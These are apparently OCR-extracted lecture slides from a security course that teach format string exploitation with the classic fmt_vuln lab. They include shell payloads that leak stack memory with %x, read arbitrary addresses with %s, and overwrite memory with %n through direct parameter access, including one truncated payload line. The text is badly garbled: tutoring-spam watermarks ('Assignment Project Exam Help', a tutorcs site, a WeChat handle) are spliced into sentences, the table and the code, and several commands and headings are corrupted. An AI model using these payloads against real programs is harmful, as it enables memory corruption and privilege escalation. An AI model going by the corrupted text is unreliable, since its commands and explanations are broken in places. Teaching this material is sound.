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FORMAT STRINGS

SEC204

Overview

- Introduction Assignment Project Exam Help
- Format String Vulnerability https://tutorcs.com

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FORMAT PARAMETERS

- Format string exploits can also be used to gain control of a program
- Format string parameters are used to determine the data type of an input Assignment Project Exam Help

Parameter	Input Type	Output Type
%d	htteps://	tutoucs.com
%u	Value	Unsigned decimal
%x	WeCh	atexastillationes
%s	Pointer	String
%n	Pointer	Number of bytes written so far

printf("A is %d and is at %08x. B is $%x.\n''$, A, &A, B);

FORMAT PARAMETERS

What if you provided the wrong number of parameters?

```
Printf("A is %d.and is at %08x. B is %x.\n" Help rather than

printf("A is %d Inters://tutorcs.com".\n", A, &A, B);
```

• Try this at fmt_uncommercial: cstutorcs

```
$ gcc fmt_uncommon2.c
$ ./a.out
```

• What is this third output b7fd6ff4?

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FORMAT STRONGS WORLNERABILITY

FORMAT STRING VULNERABILITY

- Incorrect formatting could cause format string vulnerabilities
 - E.g. print(string), rather than pript("%s" string am Help
 - The print function will still display string, but the format function is passed the address of the string, not the address of a format string.
 This could cause the stack pointer to reference a piece of memory in a preceding stack frame WeChat: cstutorcs
- Lets run fmt_vuln.c in the hackingVM (CompArchitecture)

```
$ gcc -o fmt_vuln_fmt_vuln.c
$ sudo chown root:root ./fmt_vuln || sudo chmod u+s ./fmt_vuln
$ ./fmt_vuln testing
$ ./fmt_vuln testing%x
$ ./fmt_vuln $ (perl -e 'print "%08x."x40')
```

READING FROM ARBITRARY ADDRESSES

- The %s format could be used to read from arbitrary memory addresses.
 - Part of the original format parameter

 Part of the original format parameter

```
$ ./fmt_vuln AAAA%08x.https://tutorcs.com
```

• AAAA indicates that the fourth format parameter is reading from the beginning of the format etrips the fourth format parameter is %s instead of %x? It will attempt to print the string located at 0x41414141.

```
$ env | grep PATH
$ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0xbffffdd7
$ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s
```

WRITING TO ARBITRARY MEMORY ADDRESSES

- The %s format could be used to read from arbitrary memory addresses. We can write to an arbitrary address with the %n parameter.
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 - Lets overwrite the test_val variable

- The resulting value depends on the number of bytes written before the %n.
- For example, to write AA onto test_val:

```
$ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n
$ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n
```

DIRECT PARAMETER ACCESS

- The previous examples required sequential attempts to pass format parameter arguments.
- To simplify format string explaits wp can use threat parameter access
 - Allows parameters to be accessed directly using the dollar sign qualifier (e.g. %n\$d will access the nth parameter and display it as a decimal number https://tutorcs.com

```
printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
will print:
7th: 70, 4th: 00040

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```

• Back to fmt vuln:

```
$ ./fmt_vuln AAAA%4\$x
$ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" .
"\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%4\$n
$ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" .
"\x96\x97\x04\x08" . "\x97\x97\x04\x08"')%98x%4\$n%139x%5\$n
$ ./fmt_vuln $(perl -e 'print "\x94\x97\x04\x08" . "\x95\x97\x04\x08" .
"\x96\x97\x04\x08" . "\x97\x97\x04\x08" . "\x95\x97\x04\x08" .
```

.dtors

- Binary programs compiled with the GNU compiler use .dtors and .ctors table sections for destructors and constructors respectively
- The constructor functions are executed just before the main() exits with an exit system call.
 - We can declare a function as a destructor by defining the destructor attribute
 - Lets see the dtors_sample.c

FORMAT STRING VULNERABILITY AT NOTESEARCH

 Lets go back to the notesearch program, which also contains a format string vulnerability. Can you spot it?

FURTHER READING

• Hacking: The art of exploitation, section 0x350, pg 167-193

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